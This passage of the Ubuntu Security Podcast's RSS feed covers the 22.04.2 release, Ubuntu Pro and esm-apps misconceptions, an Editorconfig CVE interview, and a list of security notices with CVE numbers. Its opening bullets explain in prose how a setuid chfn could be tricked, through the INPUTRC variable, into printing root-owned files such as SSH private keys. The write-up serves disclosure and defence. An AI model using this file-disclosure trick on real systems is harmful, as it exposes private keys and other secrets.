<li>Found the <code>chfn</code> binary (which is used to set info about the current user in
<code>/etc/shadow</code>) would use the readline library just to read input from the user -
by default <code>readline</code> will parse its configuration from the <code>INPUTRC</code> environment
variable</li>
<li>When it encounters an invalid config, it will helpfully print out the lines of the
configuration which are invalid</li>
<li>So to get it to dump the contents of some other root-owned file, you can just
set <code>INPUTRC</code> to point to that file and execute <code>chfn</code> and it will then go parse
that - however, the file first has to appear close to the format which is
expected - and it just so happens that SSH private keys fit this bill</li>
<li>One thing to note - it only affected a Arch since on most <code>chfn</code> comes from the
standalone <code>passwd</code> package, not <code>util-linux</code> - and the <code>chfn</code> from <code>passwd</code> didn&rsquo;t
use <code>readline</code></li>
<li>Looking for environment variable use (and setuid binaries) is one of the
explicit things the security team does when <a href="https://wiki.ubuntu.com/SecurityTeam/Auditing">auditing packages as part of the MIR security review process</a></li>
</ul>
<h3 id="ubuntu-22-dot-04-dot-2-lts-released-14-55">Ubuntu 22.04.2 LTS released [14:55]</h3>
<ul>
<li>Delayed by 2 weeks - is finally here!</li>
<li>Includes various fixes rolled into the 22.04 LTS release - if you are already
running 22.04 LTS with updates enabled you will already have it
<ul>
<li>Ubuntu Pro is now integrated within <code>gnome-initial-setup</code> - previously this
was only Livepatch, but can now enable any of the Ubuntu Pro offerings as
soon as you log in for the first time.</li>
<li>After logging in you can enrol the machine in Ubuntu Pro directly from the
initial setup wizard and choose which elements - esm-infra / esm-apps /
livepatch and even FIPS and USG (Ubuntu Security Guide for CIS and DISA-STIG
compliance and auditing)</li>
<li>Uses the HWE kernel - 5.19 (22.10 - kinetic)</li>
<li>Kernel and shim etc are now signed by new signing key since old one has been
deny-listed in latest shim due to having signed a version of grub2 which is
now known to have various vulnerabilities that could enable a local attacker
to bypass secure boot restrictions (Boot Hole v3 v4?)</li>
<li>Plus a heap of other changes</li>
<li>Complete list can be found on the <a href="https://discourse.ubuntu.com/t/jammy-jellyfish-point-release-changes/29835/3">Ubuntu Discourse</a></li>
</ul>
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E188.mp3" length="20087865" type="audio/mpeg" /><itunes:duration>1144</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 187
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-187/</link>
          <pubDate>Fri, 17 Feb 2023 21:44:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>e368ca33159db57a94f0736b28893599a408982c77ef1f87a9a904f177e54cceaa98b9b76aef0553281adb927bc41b8754f216c55f2b6e2b1d4a572d28451cb5</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 187</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          After the announcement of Ubuntu Pro GA last week, we take the time to dispel
  some myths around all things Ubuntu Pro, esm-apps and apt etc, plus Camila sits
  down with Mark and David to discuss the backstory of Editorconfig...
        
        ]]></itunes:subtitle>
        <itunes:summary>  After the announcement of Ubuntu Pro GA last week, we take the time to dispel
  some myths around all things Ubuntu Pro, esm-apps and apt etc, plus Camila sits
  down with Mark and David to discuss the backstory of Editorconfig [CVE-2023-0341](https://ubuntu.com/security/CVE-2023-0341)
  and we also have a brief summary of the security updates from the past week.
  </itunes:summary>
        <description>  After the announcement of Ubuntu Pro GA last week, we take the time to dispel
  some myths around all things Ubuntu Pro, esm-apps and apt etc, plus Camila sits
  down with Mark and David to discuss the backstory of Editorconfig [CVE-2023-0341](https://ubuntu.com/security/CVE-2023-0341)
  and we also have a brief summary of the security updates from the past week.
  </description>
        <googleplay:description>  After the announcement of Ubuntu Pro GA last week, we take the time to dispel
  some myths around all things Ubuntu Pro, esm-apps and apt etc, plus Camila sits
  down with Mark and David to discuss the backstory of Editorconfig [CVE-2023-0341](https://ubuntu.com/security/CVE-2023-0341)
  and we also have a brief summary of the security updates from the past week.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>After the announcement of Ubuntu Pro GA last week, we take the time to dispel
some myths around all things Ubuntu Pro, esm-apps and apt etc, plus Camila sits
down with Mark and David to discuss the backstory of Editorconfig <a href="https://ubuntu.com/security/CVE-2023-0341">CVE-2023-0341</a>
and we also have a brief summary of the security updates from the past week.</p>
<h2 id="ubuntu-pro-esm-apps-and-apt-confusions-00-40">Ubuntu Pro, esm-apps and apt confusions [00:40]</h2>
<ul>
<li>
<p><a href="https://www.theregister.com/2022/10/13/canonical_ubuntu_ad/">https://www.theregister.com/2022/10/13/canonical_ubuntu_ad/</a></p>
<ul>
<li>talks in general about Ubuntu Pro notices in apt but doesn&rsquo;t cover any
details</li>
</ul>
</li>
<li>
<p><a href="https://www.omgubuntu.co.uk/2022/10/ubuntu-pro-terminal-ad">https://www.omgubuntu.co.uk/2022/10/ubuntu-pro-terminal-ad</a></p>
<ul>
<li>talks more about the details but seems to think it is only beneficial for
LTS releasing at the end of the LTS</li>
</ul>
</li>
<li>
<p><a href="https://news.ycombinator.com/item?id=33260896">https://news.ycombinator.com/item?id=33260896</a></p>
<ul>
<li>almost no engagement on hacker news</li>
</ul>
</li>
<li>
<p>But there has been a lot of users expressing a lot of emotion over the
appearance now of the new &lsquo;advertisement&rsquo; for Ubuntu Pro / esm-apps when they
run apt update, e.g.:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>The following security updates require Ubuntu Pro with &#39;esm-apps&#39; enabled:
</span></span><span style="display:flex;"><span>  python2.7-minimal python2.7 libpython2.7-minimal libpython2.7-stdlib
</span></span><span style="display:flex;"><span>Learn more about Ubuntu Pro at https://ubuntu.com/pro
</span></span></code></pre></div></li>
<li>
<p>There appears to be a few main issues:</p>
<ol>
<li>Users don&rsquo;t like what appears to be an advertisement in the apt output</li>
<li>Some updates now appear to be behind a &ldquo;paywall&rdquo;</li>
<li>Whilst they are free for personal use, to get access to them you need to
register an account on Ubuntu One etc and this requires providing various
high-level personal details (Name, Email etc)</li>
</ol>
</li>
<li>
<p>So let&rsquo;s take some time to look into these issues:</p>
<ol>
<li>This is not the first time Canonical has tried to raise awareness of
various products - e.g. motd etc - so perhaps this causes more frustration
for users - however, if desired it can be disabled:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>pro config set apt_news False
</span></span></code></pre></div></li>
<li>Ubuntu Pro is free for personal / small-scale commercial use - any user is
entitled to a free Ubuntu Pro subscription on up to 5 machines
<ul>
<li>this can be for bare metal or virtual machines and using either Ubuntu
Server or Desktop - the install / Ubuntu type doesn&rsquo;t matter</li>
<li>and as we mentioned last week, if you are an Ubuntu member you get an
entitlement for 50 machines
<ul>
<li>currently this is not reflected in the <a href="https://ubuntu.com/pro/dashboard">https://ubuntu.com/pro/dashboard</a>
(it still says 5 machines against the free personal token)</li>
</ul>
</li>
</ul>
</li>
</ol>
</li>
</ul>
<figure><img src="/img/ubuntu_pro_dashboard.png">
</figure>

<ul>
<li>so there is nothing to pay here - likely most folks that find this
objectionable are personal users and so are entitled to the free
subscription</li>
<li>the other big part of this is that some folks seem to think these updates
are <strong>now</strong> only available via Ubuntu Pro when previously they were part of
the regular Ubuntu archive
<ul>
<li>this is incorrect - the <code>esm-apps</code> part of this message indicates that
these updates are for packages in the Universe component of the Ubuntu
archive - previously this has only ever been community supported - and
so the Ubuntu Security team would only ever provide security updates on
rare occasions OR if a member of the community came along and provided
an update in the form of a debdiff which could be sponsored by someone
from the Ubuntu Security team</li>
<li>but now the team <strong>is</strong> starting to do security updates for packages in
Universe and these are being made available via Ubuntu Pro</li>
<li>so if you do not enrol in Ubuntu Pro, your machine is still getting the
regular security updates for the Main+Restricted components as it
always was</li>
<li>but if you <strong>do</strong> choose to enrol in Ubuntu Pro you can get these <strong>extra</strong>
security updates that were never previously available</li>
</ul>
</li>
<li>On the issue of having to provide some personal information to get access
to Ubuntu One, I realise this can be a bit contentious given that a lot of
Ubuntu and Linux users in general can be quite privacy conscious - however
this is not really any different than other online services like
Github/Gmail etc - <strong>and</strong> as said earlier, if you choose to not enrol in
Ubuntu Pro, you are just as secure as you always were - and to avoid having
to see the prompt in your apt update output, you can disable that as
mentioned earlier and so restore your system to the same state as it used
to be - as always, you are in control of your own machine</li>
<li>Hopefully this helps to dispel some of the myths and concerns surrounding
Ubuntu Pro and encourage folks to use it - the Ubuntu Security Team and others
at Canonical have put a lot of work into Ubuntu Pro behind the scenes and we
think this provides a lot of great security benefits and so encourage all
listeners to make use of it to ensure their systems are as secure as possible</li>
</ul>
<h2 id="the-inside-story-of-editorconfig-cve-2023-0341-09-05">The inside story of Editorconfig <a href="https://ubuntu.com/security/CVE-2023-0341">CVE-2023-0341</a> [09:05]</h2>
<ul>
<li>Interview by Camila Camargo de Matos with David Fernandez Gonzalez and Mark
Esler about the discovery and investigation of <a href="https://ubuntu.com/security/CVE-2023-0341">CVE-2023-0341</a> in Editorconfig
(<a href="/episode-186/#usn-5842-1-editorconfig-core-c-vulnerability-05-24">[USN-5842-1] EditorConfig Core C vulnerability from Episode 186</a>)</li>
<li><a href="https://www.youtube.com/watch?v=Oz6_14rT72Q">Keynote: Improving FOSS Security - Mark Esler | UbuCon Asia 2022</a></li>
<li><a href="https://litios.github.io/2023/01/14/CVE-2023-0341.html">https://litios.github.io/2023/01/14/CVE-2023-0341.html</a></li>
</ul>
<h2 id="this-week-in-ubuntu-security-updates-25-19">This week in Ubuntu Security Updates [25:19]</h2>
<p>64 unique CVEs addressed</p>
<h3 id="usn-5849-1-heimdal-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5849-1">USN-5849-1</a>] Heimdal vulnerabilities</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-45142">CVE-2022-45142</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5835-4-cinder-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5835-4">USN-5835-4</a>] Cinder vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-47951">CVE-2022-47951</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5835-5-nova-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5835-5">USN-5835-5</a>] Nova vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-47951">CVE-2022-47951</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5852-1-openstack-swift-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5852-1">USN-5852-1</a>] OpenStack Swift vulnerability</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-47950">CVE-2022-47950</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5850-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5850-1">USN-5850-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-0590">CVE-2023-0590</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42895">CVE-2022-42895</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3640">CVE-2022-3640</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3628">CVE-2022-3628</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3619">CVE-2022-3619</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5854-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5854-1">USN-5854-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>11 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-43750">CVE-2022-43750</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41850">CVE-2022-41850</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41849">CVE-2022-41849</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-39842">CVE-2022-39842</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3649">CVE-2022-3649</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3646">CVE-2022-3646</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29901">CVE-2022-29901</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29900">CVE-2022-29900</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2663">CVE-2022-2663</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26373">CVE-2022-26373</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-20369">CVE-2022-20369</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5855-1-imagemagick-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5855-1">USN-5855-1</a>] ImageMagick vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-44268">CVE-2022-44268</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-44267">CVE-2022-44267</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5856-1-linux-kernel--oem--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5856-1">USN-5856-1</a>] Linux kernel (OEM) vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-3424">CVE-2022-3424</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1048">CVE-2022-1048</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0179">CVE-2023-0179</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5857-1-linux-kernel--oem--vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5857-1">USN-5857-1</a>] Linux kernel (OEM) vulnerability</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-0179">CVE-2023-0179</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5858-1-linux-kernel--oem--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5858-1">USN-5858-1</a>] Linux kernel (OEM) vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-45934">CVE-2022-45934</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42895">CVE-2022-42895</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3545">CVE-2022-3545</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0179">CVE-2023-0179</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5859-1-linux-kernel--oem--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5859-1">USN-5859-1</a>] Linux kernel (OEM) vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-42895">CVE-2022-42895</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4139">CVE-2022-4139</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3545">CVE-2022-3545</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0179">CVE-2023-0179</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5848-1-less-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5848-1">USN-5848-1</a>] less vulnerability</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-46663">CVE-2022-46663</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5860-1-linux-kernel--gke--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5860-1">USN-5860-1</a>] Linux kernel (GKE) vulnerabilities</h3>
<ul>
<li>14 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-0590">CVE-2023-0590</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-47940">CVE-2022-47940</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-45934">CVE-2022-45934</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42895">CVE-2022-42895</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41850">CVE-2022-41850</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41849">CVE-2022-41849</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3643">CVE-2022-3643</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3640">CVE-2022-3640</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3628">CVE-2022-3628</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3623">CVE-2022-3623</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3619">CVE-2022-3619</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3543">CVE-2022-3543</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42896">CVE-2022-42896</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4378">CVE-2022-4378</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5861-1-linux-kernel--dell300x--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5861-1">USN-5861-1</a>] Linux kernel (Dell300x) vulnerabilities</h3>
<ul>
<li>15 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-45934">CVE-2022-45934</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43750">CVE-2022-43750</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41850">CVE-2022-41850</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41849">CVE-2022-41849</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-39842">CVE-2022-39842</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3649">CVE-2022-3649</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3646">CVE-2022-3646</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3643">CVE-2022-3643</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29901">CVE-2022-29901</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29900">CVE-2022-29900</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2663">CVE-2022-2663</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26373">CVE-2022-26373</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-20369">CVE-2022-20369</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42896">CVE-2022-42896</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43945">CVE-2022-43945</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5862-1-linux-kernel--qualcomm-snapdragon--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5862-1">USN-5862-1</a>] Linux kernel (Qualcomm Snapdragon) vulnerabilities</h3>
<ul>
<li>11 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-43750">CVE-2022-43750</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41850">CVE-2022-41850</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41849">CVE-2022-41849</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-39842">CVE-2022-39842</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3649">CVE-2022-3649</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3646">CVE-2022-3646</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29901">CVE-2022-29901</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29900">CVE-2022-29900</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2663">CVE-2022-2663</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26373">CVE-2022-26373</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-20369">CVE-2022-20369</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5863-1-linux-kernel--azure--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5863-1">USN-5863-1</a>] Linux kernel (Azure) vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-45934">CVE-2022-45934</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3643">CVE-2022-3643</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42896">CVE-2022-42896</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43945">CVE-2022-43945</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5865-1-linux-kernel--azure--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5865-1">USN-5865-1</a>] Linux kernel (Azure) vulnerabilities</h3>
<ul>
<li>11 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-43750">CVE-2022-43750</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41850">CVE-2022-41850</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41849">CVE-2022-41849</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-39842">CVE-2022-39842</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3649">CVE-2022-3649</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3646">CVE-2022-3646</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29901">CVE-2022-29901</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29900">CVE-2022-29900</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2663">CVE-2022-2663</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26373">CVE-2022-26373</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-20369">CVE-2022-20369</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5866-1-nova-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5866-1">USN-5866-1</a>] Nova vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-37394">CVE-2022-37394</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3654">CVE-2021-3654</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-17376">CVE-2020-17376</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-18191">CVE-2017-18191</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2015-9543">CVE-2015-9543</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5867-1-webkitgtk-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5867-1">USN-5867-1</a>] WebKitGTK vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-23518">CVE-2023-23518</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23517">CVE-2023-23517</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42826">CVE-2022-42826</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5864-1-fig2dev-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5864-1">USN-5864-1</a>] Fig2dev vulnerabilities</h3>
<ul>
<li>14 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-32280">CVE-2021-32280</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3561">CVE-2021-3561</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-21676">CVE-2020-21676</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-21675">CVE-2020-21675</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-21535">CVE-2020-21535</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-21534">CVE-2020-21534</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-21533">CVE-2020-21533</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-21532">CVE-2020-21532</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-21531">CVE-2020-21531</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-21530">CVE-2020-21530</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-21529">CVE-2020-21529</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19797">CVE-2019-19797</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19555">CVE-2019-19555</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14275">CVE-2019-14275</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="lsn-0091-1-linux-kernel-vulnerability">[<a href="https://ubuntu.com/security/notices/LSN-0091-1">LSN-0091-1</a>] Linux kernel vulnerability</h3>
<ul>
<li>2 CVEs addressed in
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-42719">CVE-2022-42719</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41222">CVE-2022-41222</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5869-1-haproxy-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5869-1">USN-5869-1</a>] HAProxy vulnerability</h3>
<ul>
